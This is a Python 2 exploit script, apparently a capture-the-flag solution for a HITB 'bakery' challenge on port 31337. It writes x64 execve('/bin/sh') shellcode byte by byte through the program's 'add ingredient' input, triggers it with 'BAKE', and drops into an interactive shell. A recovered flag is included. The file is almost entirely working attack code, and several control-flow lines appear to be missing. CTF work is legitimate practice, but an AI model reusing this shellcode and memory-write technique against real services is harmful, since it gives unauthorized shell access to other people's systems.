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Created March 23, 2016 03:09
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#!/usr/bin/env python2
# bakery@ip-172-31-31-97:/home/bakery$ cat YOU_WANT_THIS_ONE
# You win! The flag is HITB{24d467d954cc08efbfa6acd8341e55d7}
# @_hugsy_
import socket, struct, sys, telnetlib, binascii
# HOST = "localhost"
HOST = ""
PORT = 31337
def h_s(i,signed=False): return struct.pack("<H", i) if not signed else struct.pack("<h", i)
def h_u(i,signed=False): return struct.unpack("<H", i)[0] if not signed else struct.unpack("<h", i)[0]
def i_s(i,signed=False): return struct.pack("<I", i) if not signed else struct.pack("<i", i)
def i_u(i,signed=False): return struct.unpack("<I", i)[0] if not signed else struct.unpack("<i", i)[0]
def q_s(i,signed=False): return struct.pack("<Q", i) if not signed else struct.pack("<q", i)
def q_u(i,signed=False): return struct.unpack("<Q", i)[0] if not signed else struct.unpack("<q", i)[0]
def _xlog(x):
sys.stderr.write(x + "\n")
def err(msg): _xlog("[!] %s" % msg)
def ok(msg): _xlog("[+] %s" % msg)
def dbg(msg): _xlog("[*] %s" % msg)
def asm(code, arch="x86", bits=64):
r2 = "/usr/local/bin/rasm2"
cmd = "{} -a {} -b {}".format(r2, arch, bits).split(" ")
cmd+= [code, ]
try: rc = subprocess.check_output(cmd).strip()
except: return ""
return binascii.unhexlify(rc)
def grab_banner(s, until_pattern="> "):
data = s.read_until(until_pattern)
# dbg("Received %d bytes: %s" % (len(data), data))
return data
def build_socket(host, port):
s = telnetlib.Telnet(HOST, PORT)
ok("Connected to %s:%d" % (host, port))
return s
def interact(s):
ok("""Get a PTY with ' python -c "import pty;pty.spawn('/bin/bash')" '""")
except KeyboardInterrupt:
except Exception as e:
err("Unexpected exception: %s" % e)
def find_closest_upper_bound(x):
a = x >> 8
a+= 1
return a << 8
def write_char_in_memory(sock, char, init):
sock.read_until("add ingredient> ")
dbg("Writing char=%c rand=%d" % (char, init))
# ensuring base ends with a NULL byte
base = init + sum( [ord(x) for x in 'FLOUR'] )
top = base
if base & 0xff != 0x00:
top = find_closest_upper_bound(base)
dbg("Using top=%d, base=%d" % (top, base))
diff = top-base
t = diff / 0x41
base_hex = chr(0x41) * t
r = diff % 0x41
if r > 0:
base_hex+= "\x01" * r
# from here we fully control the character @ mmap_buf[i]
msg = 'FLOUR' + base_hex + char
dbg("Sending '%s'" % repr(msg))
sock.write(msg + "\n")
def pwn(s):
# get the init rand()
parts = s.read_until("\n").split()
temp = int(parts[5])
ok("Got temp=%d" % temp)
rand = temp / 0x1337
ok("Got rand=%d" % rand)
# shellcode from
# x64: execve('/bin/sh')
sc = "\x48\x31\xd2" # xor rdx, rdx
sc+= "\x48\x31\xc0" # xor rax, rax
sc+= "\x48\x31\xf6" # xor rsi, rsi
sc+= "\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68" # mov rbx, 0x68732f6e69622f2f
sc+= "\x48\xc1\xeb\x08" # shr rbx, 0x8
sc+= "\x53" # push rbx
sc+= "\x48\x89\xe7" # mov rdi, rsp
sc+= "\xc6\xc0\x3b" # mov al, 59
sc+= "\x0f\x05" # syscall
sc+= "\xff\xc0" # inc eax
sc+= "\x48\x31\xff" # xor rdi, rdi
sc+= "\x0f\x05" # syscall
sc+= "\x90"*10 + "\xcc"
for c in sc:
write_char_in_memory(s, c, rand & 0xff)
ret = True
ret = False
if ret:
s.read_until("add ingredient> ")
s.write("BAKE" + '\n' )
return ret
if __name__ == "__main__":
s = build_socket(HOST, PORT)
raw_input("Attach with GDB and hit Enter ")
grab_banner(s, "RAISIN")
grab_banner(s, "\n\n")
ok("Got banner")
if pwn(s):
ok("Got it, interacting (Ctrl-C to break)")
ret = 0
err("Failed to exploit")
ret = 1
# auto-generated by gef
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